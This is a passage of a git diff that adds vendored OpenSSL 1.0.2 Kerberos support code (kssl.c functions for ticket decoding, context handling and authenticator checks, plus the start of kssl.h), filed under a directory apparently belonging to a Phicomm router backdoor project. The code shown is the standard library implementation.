+        krb5rc = krb5_kt_resolve(krb5context, kssl_ctx->keytab_file,
+                                 &krb5keytab);
+        if (krb5rc) {
+            kssl_err_set(kssl_err, SSL_R_KRB5_S_INIT,
+                         "krb5_kt_resolve() fails.\n");
+            goto err;
+        }
+    } else {
+        krb5rc = krb5_kt_default(krb5context, &krb5keytab);
+        if (krb5rc) {
+            kssl_err_set(kssl_err, SSL_R_KRB5_S_INIT,
+                         "krb5_kt_default() fails.\n");
+            goto err;
+        }
+    }
+
+    /*-     Actual Kerberos5 krb5_recvauth() has initial conversation here
+     *      o       check KRB5_SENDAUTH_BADAUTHVERS
+     *              unless KRB5_RECVAUTH_SKIP_VERSION
+     *      o       check KRB5_SENDAUTH_BADAPPLVERS
+     *      o       send "0" msg if all OK
+     */
+
+    /*-
+     * 20010411 was using AP_REQ instead of true KerberosWrapper
+     *
+     *  if ((krb5rc = krb5_rd_req(krb5context, &krb5auth_context,
+     *                      &krb5in_data, krb5server, krb5keytab,
+     *                      &ap_option, &krb5ticket)) != 0)  { Error }
+     */
+
+    p = (unsigned char *)indata->data;
+    if ((asn1ticket = (KRB5_TKTBODY *)d2i_KRB5_TICKET(NULL, &p,
+                                                      (long)indata->length))
+        == NULL) {
+        BIO_snprintf(kssl_err->text, KSSL_ERR_MAX,
+                     "d2i_KRB5_TICKET() ASN.1 decode failure.\n");
+        kssl_err->reason = SSL_R_KRB5_S_RD_REQ;
+        goto err;
+    }
+
+    /*
+     * Was: krb5rc = krb5_decode_ticket(krb5in_data,&krb5ticket)) != 0)
+     */
+    if ((krb5rc = kssl_TKT2tkt(krb5context, asn1ticket, &krb5ticket,
+                               kssl_err)) != 0) {
+        BIO_snprintf(kssl_err->text, KSSL_ERR_MAX,
+                     "Error converting ASN.1 ticket to krb5_ticket.\n");
+        kssl_err->reason = SSL_R_KRB5_S_RD_REQ;
+        goto err;
+    }
+
+    if (!krb5_principal_compare(krb5context, krb5server, krb5ticket->server)) {
+        krb5rc = KRB5_PRINC_NOMATCH;
+        BIO_snprintf(kssl_err->text, KSSL_ERR_MAX,
+                     "server principal != ticket principal\n");
+        kssl_err->reason = SSL_R_KRB5_S_RD_REQ;
+        goto err;
+    }
+    if ((krb5rc = krb5_kt_get_entry(krb5context, krb5keytab,
+                                    krb5ticket->server,
+                                    krb5ticket->enc_part.kvno,
+                                    krb5ticket->enc_part.enctype,
+                                    &kt_entry)) != 0) {
+        BIO_snprintf(kssl_err->text, KSSL_ERR_MAX,
+                     "krb5_kt_get_entry() fails with %x.\n", krb5rc);
+        kssl_err->reason = SSL_R_KRB5_S_RD_REQ;
+        goto err;
+    }
+    if ((krb5rc = krb5_decrypt_tkt_part(krb5context, &kt_entry.key,
+                                        krb5ticket)) != 0) {
+        BIO_snprintf(kssl_err->text, KSSL_ERR_MAX,
+                     "krb5_decrypt_tkt_part() failed.\n");
+        kssl_err->reason = SSL_R_KRB5_S_RD_REQ;
+        goto err;
+    } else {
+        krb5_kt_free_entry(krb5context, &kt_entry);
+# ifdef KSSL_DEBUG
+        {
+            int i;
+            krb5_address **paddr = krb5ticket->enc_part2->caddrs;
+            fprintf(stderr, "Decrypted ticket fields:\n");
+            fprintf(stderr, "\tflags: %X, transit-type: %X",
+                    krb5ticket->enc_part2->flags,
+                    krb5ticket->enc_part2->transited.tr_type);
+            print_krb5_data("\ttransit-data: ",
+                            &(krb5ticket->enc_part2->transited.tr_contents));
+            fprintf(stderr, "\tcaddrs: %p, authdata: %p\n",
+                    krb5ticket->enc_part2->caddrs,
+                    krb5ticket->enc_part2->authorization_data);
+            if (paddr) {
+                fprintf(stderr, "\tcaddrs:\n");
+                for (i = 0; paddr[i] != NULL; i++) {
+                    krb5_data d;
+                    d.length = paddr[i]->length;
+                    d.data = paddr[i]->contents;
+                    print_krb5_data("\t\tIP: ", &d);
+                }
+            }
+            fprintf(stderr, "\tstart/auth/end times: %d / %d / %d\n",
+                    krb5ticket->enc_part2->times.starttime,
+                    krb5ticket->enc_part2->times.authtime,
+                    krb5ticket->enc_part2->times.endtime);
+        }
+# endif                         /* KSSL_DEBUG */
+    }
+
+    krb5rc = KRB5_NO_TKT_SUPPLIED;
+    if (!krb5ticket || !krb5ticket->enc_part2 ||
+        !krb5ticket->enc_part2->client ||
+        !krb5ticket->enc_part2->client->data ||
+        !krb5ticket->enc_part2->session) {
+        kssl_err_set(kssl_err, SSL_R_KRB5_S_BAD_TICKET,
+                     "bad ticket from krb5_rd_req.\n");
+    } else if (kssl_ctx_setprinc(kssl_ctx, KSSL_CLIENT,
+                                 &krb5ticket->enc_part2->client->realm,
+                                 krb5ticket->enc_part2->client->data,
+                                 krb5ticket->enc_part2->client->length)) {
+        kssl_err_set(kssl_err, SSL_R_KRB5_S_BAD_TICKET,
+                     "kssl_ctx_setprinc() fails.\n");
+    } else if (kssl_ctx_setkey(kssl_ctx, krb5ticket->enc_part2->session)) {
+        kssl_err_set(kssl_err, SSL_R_KRB5_S_BAD_TICKET,
+                     "kssl_ctx_setkey() fails.\n");
+    } else if (krb5ticket->enc_part2->flags & TKT_FLG_INVALID) {
+        krb5rc = KRB5KRB_AP_ERR_TKT_INVALID;
+        kssl_err_set(kssl_err, SSL_R_KRB5_S_BAD_TICKET,
+                     "invalid ticket from krb5_rd_req.\n");
+    } else
+        krb5rc = 0;
+
+    kssl_ctx->enctype = krb5ticket->enc_part.enctype;
+    ttimes->authtime = krb5ticket->enc_part2->times.authtime;
+    ttimes->starttime = krb5ticket->enc_part2->times.starttime;
+    ttimes->endtime = krb5ticket->enc_part2->times.endtime;
+    ttimes->renew_till = krb5ticket->enc_part2->times.renew_till;
+
+ err:
+# ifdef KSSL_DEBUG
+    kssl_ctx_show(kssl_ctx);
+# endif                         /* KSSL_DEBUG */
+
+    if (asn1ticket)
+        KRB5_TICKET_free((KRB5_TICKET *) asn1ticket);
+    if (krb5keytab)
+        krb5_kt_close(krb5context, krb5keytab);
+    if (krb5ticket)
+        krb5_free_ticket(krb5context, krb5ticket);
+    if (krb5server)
+        krb5_free_principal(krb5context, krb5server);
+    return (krb5rc);
+}
+
+/*
+ * Allocate & return a new kssl_ctx struct.
+ */
+KSSL_CTX *kssl_ctx_new(void)
+{
+    return ((KSSL_CTX *)kssl_calloc(1, sizeof(KSSL_CTX)));
+}
+
+/*
+ * Frees a kssl_ctx struct and any allocated memory it holds.  Returns NULL.
+ */
+KSSL_CTX *kssl_ctx_free(KSSL_CTX *kssl_ctx)
+{
+    if (kssl_ctx == NULL)
+        return kssl_ctx;
+
+    if (kssl_ctx->key)
+        OPENSSL_cleanse(kssl_ctx->key, kssl_ctx->length);
+    if (kssl_ctx->key)
+        kssl_free(kssl_ctx->key);
+    if (kssl_ctx->client_princ)
+        kssl_free(kssl_ctx->client_princ);
+    if (kssl_ctx->service_host)
+        kssl_free(kssl_ctx->service_host);
+    if (kssl_ctx->service_name)
+        kssl_free(kssl_ctx->service_name);
+    if (kssl_ctx->keytab_file)
+        kssl_free(kssl_ctx->keytab_file);
+
+    kssl_free(kssl_ctx);
+    return (KSSL_CTX *)NULL;
+}
+
+/*
+ * Given an array of (krb5_data *) entity (and optional realm), set the plain
+ * (char *) client_princ or service_host member of the kssl_ctx struct.
+ */
+krb5_error_code
+kssl_ctx_setprinc(KSSL_CTX *kssl_ctx, int which,
+                  krb5_data *realm, krb5_data *entity, int nentities)
+{
+    char **princ;
+    int length;
+    int i;
+
+    if (kssl_ctx == NULL || entity == NULL)
+        return KSSL_CTX_ERR;
+
+    switch (which) {
+    case KSSL_CLIENT:
+        princ = &kssl_ctx->client_princ;
+        break;
+    case KSSL_SERVER:
+        princ = &kssl_ctx->service_host;
+        break;
+    default:
+        return KSSL_CTX_ERR;
+        break;
+    }
+    if (*princ)
+        kssl_free(*princ);
+
+    /* Add up all the entity->lengths */
+    length = 0;
+    for (i = 0; i < nentities; i++) {
+        length += entity[i].length;
+    }
+    /* Add in space for the '/' character(s) (if any) */
+    length += nentities - 1;
+    /* Space for the ('@'+realm+NULL | NULL) */
+    length += ((realm) ? realm->length + 2 : 1);
+
+    if ((*princ = kssl_calloc(1, length)) == NULL)
+        return KSSL_CTX_ERR;
+    else {
+        for (i = 0; i < nentities; i++) {
+            strncat(*princ, entity[i].data, entity[i].length);
+            if (i < nentities - 1) {
+                strcat(*princ, "/");
+            }
+        }
+        if (realm) {
+            strcat(*princ, "@");
+            (void)strncat(*princ, realm->data, realm->length);
+        }
+    }
+
+    return KSSL_CTX_OK;
+}
+
+/*-     Set one of the plain (char *) string members of the kssl_ctx struct.
+ *      Default values should be:
+ *              which == KSSL_SERVICE   =>      "khost" (KRB5SVC)
+ *              which == KSSL_KEYTAB    =>      "/etc/krb5.keytab" (KRB5KEYTAB)
+ */
+krb5_error_code kssl_ctx_setstring(KSSL_CTX *kssl_ctx, int which, char *text)
+{
+    char **string;
+
+    if (!kssl_ctx)
+        return KSSL_CTX_ERR;
+
+    switch (which) {
+    case KSSL_SERVICE:
+        string = &kssl_ctx->service_name;
+        break;
+    case KSSL_SERVER:
+        string = &kssl_ctx->service_host;
+        break;
+    case KSSL_CLIENT:
+        string = &kssl_ctx->client_princ;
+        break;
+    case KSSL_KEYTAB:
+        string = &kssl_ctx->keytab_file;
+        break;
+    default:
+        return KSSL_CTX_ERR;
+        break;
+    }
+    if (*string)
+        kssl_free(*string);
+
+    if (!text) {
+        *string = '\0';
+        return KSSL_CTX_OK;
+    }
+
+    if ((*string = kssl_calloc(1, strlen(text) + 1)) == NULL)
+        return KSSL_CTX_ERR;
+    else
+        strcpy(*string, text);
+
+    return KSSL_CTX_OK;
+}
+
+/*
+ * Copy the Kerberos session key from a (krb5_keyblock *) to a kssl_ctx
+ * struct.  Clear kssl_ctx->key if Kerberos session key is NULL.
+ */
+krb5_error_code kssl_ctx_setkey(KSSL_CTX *kssl_ctx, krb5_keyblock *session)
+{
+    int length;
+    krb5_enctype enctype;
+    krb5_octet FAR *contents = NULL;
+
+    if (!kssl_ctx)
+        return KSSL_CTX_ERR;
+
+    if (kssl_ctx->key) {
+        OPENSSL_cleanse(kssl_ctx->key, kssl_ctx->length);
+        kssl_free(kssl_ctx->key);
+    }
+
+    if (session) {
+
+# ifdef KRB5_HEIMDAL
+        length = session->keyvalue->length;
+        enctype = session->keytype;
+        contents = session->keyvalue->contents;
+# else
+        length = session->length;
+        enctype = session->enctype;
+        contents = session->contents;
+# endif
+        kssl_ctx->enctype = enctype;
+        kssl_ctx->length = length;
+    } else {
+        kssl_ctx->enctype = ENCTYPE_UNKNOWN;
+        kssl_ctx->length = 0;
+        return KSSL_CTX_OK;
+    }
+
+    if ((kssl_ctx->key =
+         (krb5_octet FAR *)kssl_calloc(1, kssl_ctx->length)) == NULL) {
+        kssl_ctx->length = 0;
+        return KSSL_CTX_ERR;
+    } else
+        memcpy(kssl_ctx->key, contents, length);
+
+    return KSSL_CTX_OK;
+}
+
+/*
+ * Display contents of kssl_ctx struct
+ */
+void kssl_ctx_show(KSSL_CTX *kssl_ctx)
+{
+    int i;
+
+    printf("kssl_ctx: ");
+    if (kssl_ctx == NULL) {
+        printf("NULL\n");
+        return;
+    } else
+        printf("%p\n", (void *)kssl_ctx);
+
+    printf("\tservice:\t%s\n",
+           (kssl_ctx->service_name) ? kssl_ctx->service_name : "NULL");
+    printf("\tclient:\t%s\n",
+           (kssl_ctx->client_princ) ? kssl_ctx->client_princ : "NULL");
+    printf("\tserver:\t%s\n",
+           (kssl_ctx->service_host) ? kssl_ctx->service_host : "NULL");
+    printf("\tkeytab:\t%s\n",
+           (kssl_ctx->keytab_file) ? kssl_ctx->keytab_file : "NULL");
+    printf("\tkey [%d:%d]:\t", kssl_ctx->enctype, kssl_ctx->length);
+
+    for (i = 0; i < kssl_ctx->length && kssl_ctx->key; i++) {
+        printf("%02x", kssl_ctx->key[i]);
+    }
+    printf("\n");
+    return;
+}
+
+int kssl_keytab_is_available(KSSL_CTX *kssl_ctx)
+{
+    krb5_context krb5context = NULL;
+    krb5_keytab krb5keytab = NULL;
+    krb5_keytab_entry entry;
+    krb5_principal princ = NULL;
+    krb5_error_code krb5rc = KRB5KRB_ERR_GENERIC;
+    int rc = 0;
+
+    if ((krb5rc = krb5_init_context(&krb5context)))
+        return (0);
+
+    /*
+     * kssl_ctx->keytab_file == NULL ==> use Kerberos default
+     */
+    if (kssl_ctx->keytab_file) {
+        krb5rc = krb5_kt_resolve(krb5context, kssl_ctx->keytab_file,
+                                 &krb5keytab);
+        if (krb5rc)
+            goto exit;
+    } else {
+        krb5rc = krb5_kt_default(krb5context, &krb5keytab);
+        if (krb5rc)
+            goto exit;
+    }
+
+    /* the host key we are looking for */
+    krb5rc = krb5_sname_to_principal(krb5context, NULL,
+                                     kssl_ctx->
+                                     service_name ? kssl_ctx->service_name :
+                                     KRB5SVC, KRB5_NT_SRV_HST, &princ);
+
+    if (krb5rc)
+        goto exit;
+
+    krb5rc = krb5_kt_get_entry(krb5context, krb5keytab, princ,
+                               /* IGNORE_VNO */
+                               0,
+                               /* IGNORE_ENCTYPE */
+                               0, &entry);
+    if (krb5rc == KRB5_KT_NOTFOUND) {
+        rc = 1;
+        goto exit;
+    } else if (krb5rc)
+        goto exit;
+
+    krb5_kt_free_entry(krb5context, &entry);
+    rc = 1;
+
+ exit:
+    if (krb5keytab)
+        krb5_kt_close(krb5context, krb5keytab);
+    if (princ)
+        krb5_free_principal(krb5context, princ);
+    if (krb5context)
+        krb5_free_context(krb5context);
+    return (rc);
+}
+
+int kssl_tgt_is_available(KSSL_CTX *kssl_ctx)
+{
+    krb5_error_code krb5rc = KRB5KRB_ERR_GENERIC;
+    krb5_context krb5context = NULL;
+    krb5_ccache krb5ccdef = NULL;
+    krb5_creds krb5creds, *krb5credsp = NULL;
+    int rc = 0;
+
+    memset((char *)&krb5creds, 0, sizeof(krb5creds));
+
+    if (!kssl_ctx)
+        return (0);
+
+    if (!kssl_ctx->service_host)
+        return (0);
+
+    if ((krb5rc = krb5_init_context(&krb5context)) != 0)
+        goto err;
+
+    if ((krb5rc = krb5_sname_to_principal(krb5context,
+                                          kssl_ctx->service_host,
+                                          (kssl_ctx->service_name) ?
+                                          kssl_ctx->service_name : KRB5SVC,
+                                          KRB5_NT_SRV_HST,
+                                          &krb5creds.server)) != 0)
+        goto err;
+
+    if ((krb5rc = krb5_cc_default(krb5context, &krb5ccdef)) != 0)
+        goto err;
+
+    if ((krb5rc = krb5_cc_get_principal(krb5context, krb5ccdef,
+                                        &krb5creds.client)) != 0)
+        goto err;
+
+    if ((krb5rc = krb5_get_credentials(krb5context, 0, krb5ccdef,
+                                       &krb5creds, &krb5credsp)) != 0)
+        goto err;
+
+    rc = 1;
+
+ err:
+# ifdef KSSL_DEBUG
+    kssl_ctx_show(kssl_ctx);
+# endif                         /* KSSL_DEBUG */
+
+    if (krb5creds.client)
+        krb5_free_principal(krb5context, krb5creds.client);
+    if (krb5creds.server)
+        krb5_free_principal(krb5context, krb5creds.server);
+    if (krb5context)
+        krb5_free_context(krb5context);
+    return (rc);
+}
+
+# if !defined(OPENSSL_SYS_WINDOWS) && !defined(OPENSSL_SYS_WIN32)
+void kssl_krb5_free_data_contents(krb5_context context, krb5_data *data)
+{
+#  ifdef KRB5_HEIMDAL
+    data->length = 0;
+    if (data->data)
+        free(data->data);
+#  elif defined(KRB5_MIT_OLD11)
+    if (data->data) {
+        krb5_xfree(data->data);
+        data->data = 0;
+    }
+#  else
+    krb5_free_data_contents(NULL, data);
+#  endif
+}
+# endif
+/* !OPENSSL_SYS_WINDOWS && !OPENSSL_SYS_WIN32 */
+
+/*
+ * Given pointers to KerberosTime and struct tm structs, convert the
+ * KerberosTime string to struct tm.  Note that KerberosTime is a
+ * ASN1_GENERALIZEDTIME value, constrained to GMT with no fractional seconds
+ * as defined in RFC 1510.  Return pointer to the (partially) filled in
+ * struct tm on success, return NULL on failure.
+ */
+static struct tm *k_gmtime(ASN1_GENERALIZEDTIME *gtime, struct tm *k_tm)
+{
+    char c, *p;
+
+    if (!k_tm)
+        return NULL;
+    if (gtime == NULL || gtime->length < 14)
+        return NULL;
+    if (gtime->data == NULL)
+        return NULL;
+
+    p = (char *)&gtime->data[14];
+
+    c = *p;
+    *p = '\0';
+    p -= 2;
+    k_tm->tm_sec = atoi(p);
+    *(p + 2) = c;
+    c = *p;
+    *p = '\0';
+    p -= 2;
+    k_tm->tm_min = atoi(p);
+    *(p + 2) = c;
+    c = *p;
+    *p = '\0';
+    p -= 2;
+    k_tm->tm_hour = atoi(p);
+    *(p + 2) = c;
+    c = *p;
+    *p = '\0';
+    p -= 2;
+    k_tm->tm_mday = atoi(p);
+    *(p + 2) = c;
+    c = *p;
+    *p = '\0';
+    p -= 2;
+    k_tm->tm_mon = atoi(p) - 1;
+    *(p + 2) = c;
+    c = *p;
+    *p = '\0';
+    p -= 4;
+    k_tm->tm_year = atoi(p) - 1900;
+    *(p + 4) = c;
+
+    return k_tm;
+}
+
+/*
+ * Helper function for kssl_validate_times().  We need context->clockskew,
+ * but krb5_context is an opaque struct.  So we try to sneek the clockskew
+ * out through the replay cache.  If that fails just return a likely default
+ * (300 seconds).
+ */
+static krb5_deltat get_rc_clockskew(krb5_context context)
+{
+    krb5_rcache rc;
+    krb5_deltat clockskew;
+
+    if (krb5_rc_default(context, &rc))
+        return KSSL_CLOCKSKEW;
+    if (krb5_rc_initialize(context, rc, 0))
+        return KSSL_CLOCKSKEW;
+    if (krb5_rc_get_lifespan(context, rc, &clockskew)) {
+        clockskew = KSSL_CLOCKSKEW;
+    }
+    (void)krb5_rc_destroy(context, rc);
+    return clockskew;
+}
+
+/*
+ * kssl_validate_times() combines (and more importantly exposes) the MIT KRB5
+ * internal function krb5_validate_times() and the in_clock_skew() macro.
+ * The authenticator client time is checked to be within clockskew secs of
+ * the current time and the current time is checked to be within the ticket
+ * start and expire times.  Either check may be omitted by supplying a NULL
+ * value.  Returns 0 for valid times, SSL_R_KRB5* error codes otherwise.  See
+ * Also: (Kerberos source)/krb5/lib/krb5/krb/valid_times.c 20010420 VRS
+ */
+krb5_error_code kssl_validate_times(krb5_timestamp atime,
+                                    krb5_ticket_times *ttimes)
+{
+    krb5_deltat skew;
+    krb5_timestamp start, now;
+    krb5_error_code rc;
+    krb5_context context;
+
+    if ((rc = krb5_init_context(&context)))
+        return SSL_R_KRB5_S_BAD_TICKET;
+    skew = get_rc_clockskew(context);
+    if ((rc = krb5_timeofday(context, &now)))
+        return SSL_R_KRB5_S_BAD_TICKET;
+    krb5_free_context(context);
+
+    if (atime && labs(atime - now) >= skew)
+        return SSL_R_KRB5_S_TKT_SKEW;
+
+    if (!ttimes)
+        return 0;
+
+    start = (ttimes->starttime != 0) ? ttimes->starttime : ttimes->authtime;
+    if (start - now > skew)
+        return SSL_R_KRB5_S_TKT_NYV;
+    if ((now - ttimes->endtime) > skew)
+        return SSL_R_KRB5_S_TKT_EXPIRED;
+
+# ifdef KSSL_DEBUG
+    fprintf(stderr, "kssl_validate_times: %d |<-  | %d - %d | < %d  ->| %d\n",
+            start, atime, now, skew, ttimes->endtime);
+# endif                         /* KSSL_DEBUG */
+
+    return 0;
+}
+
+/*
+ * Decode and decrypt given DER-encoded authenticator, then pass
+ * authenticator ctime back in *atimep (or 0 if time unavailable).  Returns
+ * krb5_error_code and kssl_err on error.  A NULL authenticator
+ * (authentp->length == 0) is not considered an error.  Note that
+ * kssl_check_authent() makes use of the KRB5 session key; you must call
+ * kssl_sget_tkt() to get the key before calling this routine.
+ */
+krb5_error_code kssl_check_authent(
+                                      /*
+                                       * IN
+                                       */ KSSL_CTX *kssl_ctx,
+                                      /*
+                                       * IN
+                                       */ krb5_data *authentp,
+                                      /*
+                                       * OUT
+                                       */ krb5_timestamp *atimep,
+                                      /*
+                                       * OUT
+                                       */ KSSL_ERR *kssl_err)
+{
+    krb5_error_code krb5rc = 0;
+    KRB5_ENCDATA *dec_authent = NULL;
+    KRB5_AUTHENTBODY *auth = NULL;
+    krb5_enctype enctype;
+    EVP_CIPHER_CTX ciph_ctx;
+    const EVP_CIPHER *enc = NULL;
+    unsigned char iv[EVP_MAX_IV_LENGTH];
+    const unsigned char *p;
+    unsigned char *unenc_authent;
+    int outl, unencbufsize;
+    struct tm tm_time, *tm_l, *tm_g;
+    time_t now, tl, tg, tr, tz_offset;
+
+    EVP_CIPHER_CTX_init(&ciph_ctx);
+    *atimep = 0;
+    kssl_err_set(kssl_err, 0, "");
+
+# ifndef KRB5CHECKAUTH
+    authentp = NULL;
+# else
+#  if     KRB5CHECKAUTH == 0
+    authentp = NULL;
+#  endif
+# endif                         /* KRB5CHECKAUTH */
+
+    if (authentp == NULL || authentp->length == 0)
+        return 0;
+
+# ifdef KSSL_DEBUG
+    {
+        unsigned int ui;
+        fprintf(stderr, "kssl_check_authent: authenticator[%d]:\n",
+                authentp->length);
+        p = authentp->data;
+        for (ui = 0; ui < authentp->length; ui++)
+            fprintf(stderr, "%02x ", p[ui]);
+        fprintf(stderr, "\n");
+    }
+# endif                         /* KSSL_DEBUG */
+
+    unencbufsize = 2 * authentp->length;
+    if ((unenc_authent = calloc(1, unencbufsize)) == NULL) {
+        kssl_err_set(kssl_err, SSL_R_KRB5_S_INIT,
+                     "Unable to allocate authenticator buffer.\n");
+        krb5rc = KRB5KRB_ERR_GENERIC;
+        goto err;
+    }
+
+    p = (unsigned char *)authentp->data;
+    if ((dec_authent = d2i_KRB5_ENCDATA(NULL, &p,
+                                        (long)authentp->length)) == NULL) {
+        kssl_err_set(kssl_err, SSL_R_KRB5_S_INIT,
+                     "Error decoding authenticator.\n");
+        krb5rc = KRB5KRB_AP_ERR_BAD_INTEGRITY;
+        goto err;
+    }
+
+    enctype = dec_authent->etype->data[0]; /* should = kssl_ctx->enctype */
+# if !defined(KRB5_MIT_OLD11)
+    switch (enctype) {
+    case ENCTYPE_DES3_CBC_SHA1: /* EVP_des_ede3_cbc(); */
+    case ENCTYPE_DES3_CBC_SHA:
+    case ENCTYPE_DES3_CBC_RAW:
+        krb5rc = 0;             /* Skip, can't handle derived keys */
+        goto err;
+    }
+# endif
+    enc = kssl_map_enc(enctype);
+    memset(iv, 0, sizeof iv);   /* per RFC 1510 */
+
+    if (enc == NULL) {
+        /*
+         * Disable kssl_check_authent for ENCTYPE_DES3_CBC_SHA1.  This
+         * enctype indicates the authenticator was encrypted using key-usage
+         * derived keys which openssl cannot decrypt.
+         */
+        goto err;
+    }
+
+    if (!EVP_CipherInit(&ciph_ctx, enc, kssl_ctx->key, iv, 0)) {
+        kssl_err_set(kssl_err, SSL_R_KRB5_S_INIT,
+                     "EVP_CipherInit error decrypting authenticator.\n");
+        krb5rc = KRB5KRB_AP_ERR_BAD_INTEGRITY;
+        goto err;
+    }
+    outl = dec_authent->cipher->length;
+    if (!EVP_Cipher
+        (&ciph_ctx, unenc_authent, dec_authent->cipher->data, outl)) {
+        kssl_err_set(kssl_err, SSL_R_KRB5_S_INIT,
+                     "EVP_Cipher error decrypting authenticator.\n");
+        krb5rc = KRB5KRB_AP_ERR_BAD_INTEGRITY;
+        goto err;
+    }
+    EVP_CIPHER_CTX_cleanup(&ciph_ctx);
+
+# ifdef KSSL_DEBUG
+    {
+        int padl;
+        fprintf(stderr, "kssl_check_authent: decrypted authenticator[%d] =\n",
+                outl);
+        for (padl = 0; padl < outl; padl++)
+            fprintf(stderr, "%02x ", unenc_authent[padl]);
+        fprintf(stderr, "\n");
+    }
+# endif                         /* KSSL_DEBUG */
+
+    if ((p = kssl_skip_confound(enctype, unenc_authent)) == NULL) {
+        kssl_err_set(kssl_err, SSL_R_KRB5_S_INIT,
+                     "confounded by authenticator.\n");
+        krb5rc = KRB5KRB_AP_ERR_BAD_INTEGRITY;
+        goto err;
+    }
+    outl -= p - unenc_authent;
+
+    if ((auth = (KRB5_AUTHENTBODY *)d2i_KRB5_AUTHENT(NULL, &p,
+                                                     (long)outl)) == NULL) {
+        kssl_err_set(kssl_err, SSL_R_KRB5_S_INIT,
+                     "Error decoding authenticator body.\n");
+        krb5rc = KRB5KRB_AP_ERR_BAD_INTEGRITY;
+        goto err;
+    }
+
+    memset(&tm_time, 0, sizeof(struct tm));
+    if (k_gmtime(auth->ctime, &tm_time) &&
+        ((tr = mktime(&tm_time)) != (time_t)(-1))) {
+        now = time(&now);
+        tm_l = localtime(&now);
+        tl = mktime(tm_l);
+        tm_g = gmtime(&now);
+        tg = mktime(tm_g);
+        tz_offset = tg - tl;
+
+        *atimep = (krb5_timestamp)(tr - tz_offset);
+    }
+# ifdef KSSL_DEBUG
+    fprintf(stderr, "kssl_check_authent: returns %d for client time ",
+            *atimep);
+    if (auth && auth->ctime && auth->ctime->length && auth->ctime->data)
+        fprintf(stderr, "%.*s\n", auth->ctime->length, auth->ctime->data);
+    else
+        fprintf(stderr, "NULL\n");
+# endif                         /* KSSL_DEBUG */
+
+ err:
+    if (auth)
+        KRB5_AUTHENT_free((KRB5_AUTHENT *) auth);
+    if (dec_authent)
+        KRB5_ENCDATA_free(dec_authent);
+    if (unenc_authent)
+        free(unenc_authent);
+    EVP_CIPHER_CTX_cleanup(&ciph_ctx);
+    return krb5rc;
+}
+
+/*
+ * Replaces krb5_build_principal_ext(), with varargs length == 2 (svc, host),
+ * because I don't know how to stub varargs.  Returns krb5_error_code ==
+ * ENOMEM on alloc error, otherwise passes back newly constructed principal,
+ * which should be freed by caller.
+ */
+krb5_error_code kssl_build_principal_2(
+                                          /*
+                                           * UPDATE
+                                           */ krb5_context context,
+                                          /*
+                                           * OUT
+                                           */ krb5_principal *princ,
+                                          /*
+                                           * IN
+                                           */ int rlen, const char *realm,
+                                          /*
+                                           * IN
+                                           */ int slen, const char *svc,
+                                          /*
+                                           * IN
+                                           */ int hlen, const char *host)
+{
+    krb5_data *p_data = NULL;
+    krb5_principal new_p = NULL;
+    char *new_r = NULL;
+
+    if ((p_data = (krb5_data *)calloc(2, sizeof(krb5_data))) == NULL ||
+        (new_p = (krb5_principal)calloc(1, sizeof(krb5_principal_data)))
+        == NULL)
+        goto err;
+    new_p->length = 2;
+    new_p->data = p_data;
+
+    if ((new_r = calloc(1, rlen + 1)) == NULL)
+        goto err;
+    memcpy(new_r, realm, rlen);
+    krb5_princ_set_realm_length(context, new_p, rlen);
+    krb5_princ_set_realm_data(context, new_p, new_r);
+
+    if ((new_p->data[0].data = calloc(1, slen + 1)) == NULL)
+        goto err;
+    memcpy(new_p->data[0].data, svc, slen);
+    new_p->data[0].length = slen;
+
+    if ((new_p->data[1].data = calloc(1, hlen + 1)) == NULL)
+        goto err;
+    memcpy(new_p->data[1].data, host, hlen);
+    new_p->data[1].length = hlen;
+
+    krb5_princ_type(context, new_p) = KRB5_NT_UNKNOWN;
+    *princ = new_p;
+    return 0;
+
+ err:
+    if (new_p && new_p[0].data)
+        free(new_p[0].data);
+    if (new_p && new_p[1].data)
+        free(new_p[1].data);
+    if (new_p)
+        free(new_p);
+    if (new_r)
+        free(new_r);
+    return ENOMEM;
+}
+
+void SSL_set0_kssl_ctx(SSL *s, KSSL_CTX *kctx)
+{
+    s->kssl_ctx = kctx;
+}
+
+KSSL_CTX *SSL_get0_kssl_ctx(SSL *s)
+{
+    return s->kssl_ctx;
+}
+
+char *kssl_ctx_get0_client_princ(KSSL_CTX *kctx)
+{
+    if (kctx)
+        return kctx->client_princ;
+    return NULL;
+}
+
+#else                           /* !OPENSSL_NO_KRB5 */
+
+# if defined(PEDANTIC) || defined(OPENSSL_SYS_VMS)
+static void *dummy = &dummy;
+# endif
+
+#endif                          /* !OPENSSL_NO_KRB5 */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/kssl.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/kssl.h
new file mode 100644
index 0000000..9a57672
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/kssl.h
@@ -0,0 +1,197 @@
+/* ssl/kssl.h -*- mode: C; c-file-style: "eay" -*- */
+/*
+ * Written by Vern Staats <staatsvr@asc.hpc.mil> for the OpenSSL project
+ * 2000. project 2000.
+ */
+/* ====================================================================
+ * Copyright (c) 2000 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    licensing@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
